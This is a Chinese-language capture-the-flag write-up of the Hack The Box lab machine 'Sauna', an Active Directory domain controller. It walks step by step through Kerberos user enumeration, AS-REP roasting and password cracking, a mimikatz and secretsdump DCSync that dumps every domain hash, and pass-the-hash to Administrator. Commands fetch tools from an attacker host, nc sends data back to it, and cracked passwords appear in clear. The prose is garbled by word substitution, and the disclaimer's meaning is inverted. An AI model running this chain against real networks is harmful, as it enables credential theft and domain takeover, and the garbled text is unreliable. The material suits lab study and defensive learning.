免责申明

本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用，请不要将文中应用的工具和浸透思路用于任何非法用处，对此产生的所有结果，自己不承当任何责任，也不对造成的任何误用或侵害负责

服务探测

端口发现

┌──(rootkali)-[~/htb/Sauna]└─# nmap -p- -Pn 10.10.10.175 --openHost discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-03 09:23 ESTNmap scan report for 10.10.10.175Host is up (0.26s latency).Not shown: 65515 filtered portsSome closed ports may be reported as filtered due to --defeat-rst-ratelimitPORT      STATE SERVICE53/tcp    open  domain80/tcp    open  http88/tcp    open  kerberos-sec135/tcp   open  msrpc139/tcp   open  netbios-ssn389/tcp   open  ldap445/tcp   open  microsoft-ds464/tcp   open  kpasswd5593/tcp   open  http-rpc-epmap636/tcp   open  ldapssl3268/tcp  open  globalcatLDAP3269/tcp  open  globalcatLDAPssl5985/tcp  open  wsman9389/tcp  open  adws49667/tcp open  unknown49673/tcp open  unknown49674/tcp open  unknown49677/tcp open  unknown49689/tcp open  unknown49697/tcp open  unknownNmap done: 1 IP address (1 host up) scanned in 1192.54 seconds

具体端口信息

──(rootkali)-[~/htb/Sauna]└─# nmap -Pn -sV -A -O 10.10.10.175 -p 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49673,49674,49677,49686,49697Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-03 09:45 ESTNmap scan report for 10.10.10.175Host is up (0.26s latency).PORT      STATE    SERVICE       VERSION53/tcp    open     domain        Simple DNS Plus80/tcp    open     http          Microsoft IIS httpd 10.0| http-methods: |_  Potentially risky methods: TRACE|_http-server-header: Microsoft-IIS/10.0|_http-title: Egotistical Bank :: Home88/tcp    open     kerberos-sec  Microsoft Windows Kerberos (server time: 2022-01-03 22:45:17Z)135/tcp   open     msrpc         Microsoft Windows RPC139/tcp   open     netbios-ssn   Microsoft Windows netbios-ssn389/tcp   open     ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)445/tcp   open     microsoft-ds?464/tcp   open     kpasswd5?593/tcp   open     ncacn_http    Microsoft Windows RPC over HTTP 1.0636/tcp   open     tcpwrapped3268/tcp  open     ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)3269/tcp  open     tcpwrapped5985/tcp  open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)|_http-server-header: Microsoft-HTTPAPI/2.0|_http-title: Not Found9389/tcp  open     adws?| fingerprint-strings: |   DNSStatusRequestTCP, Kerberos, SMBProgNeg, afp, oracle-tns: |_    Ihttp://schemas.microsoft.com/ws/2006/05/framing/faults/UnsupportedVersion49667/tcp open     msrpc         Microsoft Windows RPC49673/tcp open     ncacn_http    Microsoft Windows RPC over HTTP 1.049674/tcp open     msrpc         Microsoft Windows RPC49677/tcp open     msrpc         Microsoft Windows RPC49686/tcp filtered unknown49697/tcp open     msrpc         Microsoft Windows RPC1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :SF-Port9389-TCP:V=7.91%I=7%D=1/3%Time=61D30C0C%P=x86_64-pc-linux-gnu%r(DNSSF:StatusRequestTCP,4B,"\x08Ihttp://schemas\.microsoft\.com/ws/2006/05/fraSF:ming/faults/UnsupportedVersion")%r(Kerberos,4B,"\x08Ihttp://schemas\.miSF:crosoft\.com/ws/2006/05/framing/faults/UnsupportedVersion")%r(SMBProgNeSF:g,4B,"\x08Ihttp://schemas\.microsoft\.com/ws/2006/05/framing/faults/UnsSF:upportedVersion")%r(oracle-tns,4B,"\x08Ihttp://schemas\.microsoft\.com/SF:ws/2006/05/framing/faults/UnsupportedVersion")%r(afp,4B,"\x08Ihttp://scSF:hemas\.microsoft\.com/ws/2006/05/framing/faults/UnsupportedVersion");Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portOS fingerprint not ideal because: Missing a closed TCP port so results incompleteNo OS matches for hostNetwork Distance: 2 hopsService Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:|_clock-skew: 8h00m00s| smb2-security-mode: |   2.02: |_    Message signing enabled and required| smb2-time: |   date: 2022-01-03T22:46:21|_  start_date: N/ATRACEROUTE (using port 445/tcp)HOP RTT       ADDRESS1   253.57 ms 10.10.14.12   254.12 ms 10.10.10.175OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 121.12 seconds

有DNS，kerberos和ldap，显然这是一台DC服务器。

枚举域名

┌──(rootkali)-[~/htb/Sauna]└─# crackmapexec smb 10.10.10.175 -u 'anonymous' -p '' --shares                                 SMB         10.10.10.175    445    SAUNA            [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)SMB         10.10.10.175    445    SAUNA            [-] EGOTISTICAL-BANK.LOCAL\anonymous: STATUS_LOGON_FAILURE

失去一个域名：EGOTISTICAL-BANK.LOCAL

枚举了一大轮，拿不到任何有用的货色。无奈关上smb分享目录，也不晓得任何有用的用户名。

Kerberos

应用nmap枚举kerberos的用户名

──(rootkali)-[~/htb/Sauna]└─# nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm="EGOTISTICAL-BANK.LOCAL",userdb=/usr/share/wordlists/SecLists/Usernames/cirt-default-usernames.txt 10.10.10.175Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-03 07:03 ESTNmap scan report for 10.10.10.175Host is up (0.30s latency).PORT   STATE SERVICE88/tcp open  kerberos-sec| krb5-enum-users: | Discovered Kerberos principals|     ADMINISTRATOR@EGOTISTICAL-BANK.LOCAL|     Administrator@EGOTISTICAL-BANK.LOCAL|_    administrator@EGOTISTICAL-BANK.LOCALNmap done: 1 IP address (1 host up) scanned in 41.32 seconds

看见只有一个administrator的用户名，这个显然目前咱们是没有权限的

80端口的http服务看起来像是一个公司的介绍网页，尝试制作一份user名单

cewl -d 1 -m 3 -w user.txt 10.10.10.175

再用制作成的名单枚举kerberos的用户名

┌──(rootkali)-[~/htb/Sauna]└─# nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm="EGOTISTICAL-BANK.LOCAL",userdb=/root/htb/Sauna/user.txt 10.10.10.175Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-03 08:00 ESTNmap scan report for 10.10.10.175Host is up (0.30s latency).PORT   STATE SERVICE88/tcp open  kerberos-sec| krb5-enum-users: | Discovered Kerberos principals|_    sauna@EGOTISTICAL-BANK.LOCALNmap done: 1 IP address (1 host up) scanned in 16.22 seconds

失去一个新的用户名sauna

web

在about us页面暴露出了team member的名字，手动制作一个用户名字典
把咱们下面找到的两个kerberos的用户名也加上这个字典

┌──(rootkali)-[~/htb/Sauna]└─# cat userFergus SmithFergusSmithFergus.SmithFergusSmithFergus.SfsmithShaun CoinsShaunCoinsShaun.CoinsShaunCoinsShaun.CscoinsHugo BearHugoBearHugo.BearHugoBearHugo.BhbearBowie TaylorBowieTaylorBowie.TaylorBowieTaylorBowie.TbtaylorSophie DriverSophieDriverSophie.DriverSophieDriverSophie.DsdriverSteven KerbStevenKerbSteven.KerbStevenKerbSteven.Kskerbsaunaadministrator

应用GetNPUsers.py尝试向kerberos申请不须要预认证的票据

hacktricks里的解释:

That means that anyone can send an AS_REQ request to the DC on behalf of any of those users, and receive an AS_REP message. This last kind of message contains a chunk of data encrypted with the original user key, derived from its password. Then, by using this message, the user password could be cracked offline.

┌──(rootkali)-[~/htb/Sauna]└─# python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -usersfile /root/htb/Sauna/user  -outputfile hashes.asreproast -dc-ip 10.10.10.175

能够看到拿到一个fsmith的票据

┌──(rootkali)-[~/htb/Sauna]└─# cat hashes.asreproast $krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:85853ae8057c9c84f1ae5e3860cfcf35$29c704dfe2ce770414e478fcb530171c1b749dce35187d79c2679d93eaa6d2f5cd068123b2e4bbe3f59a94c1e589aa494ab81aa8d5c5c4d0bfdfa7a77320c3651f69e58550327e188e1b551f4d7d5a85fd0d541793c37e1908197d535f32ac12442756f3d5264610f155bcf1f341b29fa07234aaf7cd10a74c8fea80dddf6a8f5364633faf65313b81401888d24115e8c1bdb6fa2b45cf88b95c7f0b02f64cdf3ac44eb71fca52b9c187fa91bbcc9bd743ea59b8625abb2e8c94e632df4f3e2a8d50ed035e8b796e1ee1d57b1d6d85b4813af2b76c2af16da1ac9b2880f20c2afdac285dc57c200595de6d22df40eba458438d6b3082b3a66bebeeea0e04aacc

john破解

┌──(rootkali)-[~/htb/Sauna]└─# john --wordlist=/usr/share/wordlists/rockyou.txt hashes.asreproast Using default input encoding: UTF-8Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])Will run 4 OpenMP threadsPress 'q' or Ctrl-C to abort, almost any other key for statusThestrokes23     ($krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL)1g 0:00:00:10 DONE (2022-01-03 10:33) 0.09775g/s 1030Kp/s 1030Kc/s 1030KC/s Thing..Thehunter22Use the "--show" option to display all of the cracked passwords reliablySession completed

foodhold

拿到一个用户凭证：fsmith:Thestrokes23

应用evil-winrm登录，拿到foodhold和user.txt

┌──(rootkali)-[~/htb/Sauna]└─# evil-winrm -i 10.10.10.175 -u 'fsmith' -p 'Thestrokes23'Evil-WinRM shell v3.3Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machineData: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completionInfo: Establishing connection to remote endpoint*Evil-WinRM* PS C:\Users\FSmith\Documents> whoamiegotisticalbank\fsmith

提权

传winpeas和nc到靶机：
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.16.3:8000/winPEASx64.exe','C:\Users\FSmith\Desktop\winPEASx64.exe')"

执行winpea,重定向到o.txt：

&{C:\Users\FSmith\Desktop\winPEASx64.exe} > o.txt

poweshell利用nc.exe传送文件

接管
nc -nlvp 4444 > o.txt

传送
Get-Content o.txt | .\nc.exe -w 3 10.10.16.3 4444 | tee test.log

发现一个用户明码

???????????? Looking for AutoLogon credentials    Some AutoLogon credentials were found    DefaultDomainName             :  EGOTISTICALBANK    DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager    DefaultPassword               :  Moneymakestheworldgoround!

查看靶机的用户

*Evil-WinRM* PS C:\> net usersUser accounts for \\-------------------------------------------------------------------------------Administrator            FSmith                   GuestHSmith                   krbtgt                   svc_loanmgrThe command completed with one or more errors.

用evil-winrm登录到svc_loanmgr，查看用户信息信息

*Evil-WinRM* PS C:\> net users svc_loanmgrUser name                    svc_loanmgrFull Name                    L ManagerCommentUser's commentCountry/region code          000 (System Default)Account active               YesAccount expires              NeverPassword last set            1/24/2020 3:48:31 PMPassword expires             NeverPassword changeable          1/25/2020 3:48:31 PMPassword required            YesUser may change password     YesWorkstations allowed         AllLogon scriptUser profileHome directoryLast logon                   NeverLogon hours allowed          AllLocal Group Memberships      *Remote Management UseGlobal Group memberships     *Domain UsersThe command completed successfully.

看到svc_loanmgr在Remote Management Use组

查看这个组的解释

*Evil-WinRM* PS C:\Users\FSmith\Desktop> net localgroup "Remote Management Users"Alias name     Remote Management UsersComment        Members of this group can access WMI resources over management protocols (such as WS-Management via the Windows Remote Management service). This applies only to WMI namespaces that grant access to the user.Members-------------------------------------------------------------------------------FSmithsvc_loanmgrThe command completed successfully.

如同就是一个近程拜访组。

咱们尝试应用DCSync攻打尝试窃取用户哈希

对于DCSync，hacktricks上是这样解释的：

The DCSync attack simulates the behavior of a Domain Controller and asks other Domain Controllers to replicate information using the Directory Replication Service Remote Protocol (MS-DRSR). Because MS-DRSR is a valid and necessary function of Active Directory, it cannot be turned off or disabled.
By default only Domain Admins, Enterprise Admins, Administrators, and Domain Controllers groups have the required privileges.
If any account passwords are stored with reversible encryption, an option is available in Mimikatz to return the password in clear text

默认有权限执行DCSync的用户组是：Domain Admins, Enterprise Admins, Administrators, and Domain Controllers

把mimikatz.exe从kali传到靶机：

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.16.3:8000/mimikatz.exe','C:\Users\svc_loanmgr\Documents\mimikatz.exe')"

执行上面命令触发DC同步

mimikatz.exe privilege::debug "lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /all /csv" exit

能够看见导出了用户的哈希

*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> ./mimikatz.exe privilege::debug "lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /all /csv" exit  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 18 2020 19:18:29 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo) ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ##       > https://blog.gentilkiwi.com/mimikatz '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/mimikatz(commandline) # privilege::debugERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061mimikatz(commandline) # lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /all /csv[DC] 'EGOTISTICAL-BANK.LOCAL' will be the domain[DC] 'SAUNA.EGOTISTICAL-BANK.LOCAL' will be the DC server[DC] Exporting domain 'EGOTISTICAL-BANK.LOCAL'502     krbtgt  4a8899428cad97676ff802229e466e2c        5141103    HSmith  58a52d36c84fb7f5f1beab9a201db1dd        660481000    SAUNA$  230699e71e07d687981fc0685082b5cc        532480500     Administrator   823452073d75b9d1cf70ebdf86c7f98e        660481105    FSmith  58a52d36c84fb7f5f1beab9a201db1dd        42603521108    svc_loanmgr     9cb31797c39a9b170b04058ba2bba48c        66048mimikatz(commandline) # exitBye!

利用evil-winrm,应用哈希明码间接登录到Administrator（pass-the-hash）

┌──(rootkali)-[~/htb/Sauna]└─# evil-winrm -u Administrator -H 823452073d75b9d1cf70ebdf86c7f98e -i 10.10.10.175Evil-WinRM shell v3.2Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine                                                                                                 Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                                                                                                   Info: Establishing connection to remote endpoint*Evil-WinRM* PS C:\Users\Administrator\Documents> whoamiegotisticalbank\administrator

总结

通过web页面展现的信息，咱们猜测到了一个用户名
应用GetNPUsers.py尝试向kerberos申请不须要预认证的票据，咱们因而拿到了foodhold
应用winpeas，咱们枚举到了另外一个用户的明文凭证，因而咱们能够提权到svc_loanmgr
利用DCSync拿到管理员的哈希明码，从而提权到administrator

补充

secretsdump.py

拿到svc_loanmgr的凭证当前应用secretsdump.py也能够爆出其余用户的哈希明码，原理也是DCSync：

┌──(rootkali)-[~/htb/Sauna]└─# python3 /usr/share/doc/python3-impacket/examples/secretsdump.py EGOTISTICALBANK/svc_loanmgr:Moneymakestheworldgoround\\!@10.10.10.175Impacket v0.9.24.dev1+20210906.175840.50c76958 - Copyright 2021 SecureAuth Corporation[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)[*] Using the DRSUAPI method to get NTDS.DIT secretsAdministrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:230699e71e07d687981fc0685082b5cc:::[*] Kerberos keys grabbedAdministrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4eAdministrator:des-cbc-md5:fb8f321c64cea87fkrbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9krbtgt:des-cbc-md5:c170d5dc3edfc1d9EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843bEGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76bEGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacbaEGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972cEGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2SAUNA$:aes256-cts-hmac-sha1-96:8dccc32df17c3189f01f7702e6198f9a01199229d04420d830bca8dc8a1b483eSAUNA$:aes128-cts-hmac-sha1-96:a2927c8ea3e312d65894d9b1e508931fSAUNA$:des-cbc-md5:7c2c156d022c0131[*] Cleaning up...

如何晓得本账号是否有权限应用DCSync？

把PowerView.ps1下载到本地

登录到靶机

┌──(rootkali)-[~/htb/Sauna]└─# evil-winrm -i 10.10.10.175 -u 'svc_loanmgr' -p 'Moneymakestheworldgoround!' -s '/root/PowerSploit/Recon'

引入PowerView.ps1

*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> PowerView.ps1

查看svc_loanmgr和Fsmith的域权限

*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> Get-ObjectAcl -DistinguishedName "dc=EGOTISTICAL-BANK,dc=LOCAL" -ResolveGUIDs | ? {$_.IdentityReference -match "svc_loanmgr|Fsmith"}InheritedObjectType   : AllObjectDN              : DC=EGOTISTICAL-BANK,DC=LOCALObjectType            : AllIdentityReference     : EGOTISTICALBANK\FSmithIsInherited           : FalseActiveDirectoryRights : ReadProperty, GenericExecutePropagationFlags      : NoneObjectFlags           : NoneInheritanceFlags      : NoneInheritanceType       : NoneAccessControlType     : AllowObjectSID             : S-1-5-21-2966785786-3096785034-1186376766/usr/lib/ruby/vendor_ruby/net/ntlm/client/session.rb:39: warning: constant OpenSSL::Cipher::Cipher is deprecated/usr/lib/ruby/vendor_ruby/net/ntlm/client/session.rb:128: warning: constant OpenSSL::Cipher::Cipher is deprecated/usr/lib/ruby/vendor_ruby/net/ntlm/client/session.rb:138: warning: constant OpenSSL::Cipher::Cipher is deprecatedInheritedObjectType   : AllObjectDN              : DC=EGOTISTICAL-BANK,DC=LOCALObjectType            : AllIdentityReference     : EGOTISTICALBANK\svc_loanmgrIsInherited           : FalseActiveDirectoryRights : ReadProperty, GenericExecutePropagationFlags      : NoneObjectFlags           : NoneInheritanceFlags      : NoneInheritanceType       : NoneAccessControlType     : AllowObjectSID             : S-1-5-21-2966785786-3096785034-1186376766InheritedObjectType   : AllObjectDN              : DC=EGOTISTICAL-BANK,DC=LOCALObjectType            : DS-Replication-Get-ChangesIdentityReference     : EGOTISTICALBANK\svc_loanmgrIsInherited           : FalseActiveDirectoryRights : ExtendedRightPropagationFlags      : NoneObjectFlags           : ObjectAceTypePresentInheritanceFlags      : NoneInheritanceType       : NoneAccessControlType     : AllowObjectSID             : S-1-5-21-2966785786-3096785034-1186376766InheritedObjectType   : AllObjectDN              : DC=EGOTISTICAL-BANK,DC=LOCALObjectType            : DS-Replication-Get-Changes-AllIdentityReference     : EGOTISTICALBANK\svc_loanmgrIsInherited           : FalseActiveDirectoryRights : ExtendedRightPropagationFlags      : NoneObjectFlags           : ObjectAceTypePresentInheritanceFlags      : NoneInheritanceType       : NoneAccessControlType     : AllowObjectSID             : S-1-5-21-2966785786-3096785034-1186376766

注意ObjectType里显示svc_loanmgr领有 DS-Replication-Get-Changes和DS-Replication-Get-Changes-All
表明用户能够应用DCSync，参考这篇文章

另外，也能够通过bloodhound查看以后账号在域中的权限，也能够查看到是否有DCSync权限。

对于上传下载

这个我是看IppSec的视频才晓得的，evil-winrm登录当前能够间接通过upload和download命令上传下载文件，唔，原理如此不便，涨姿态了-_-！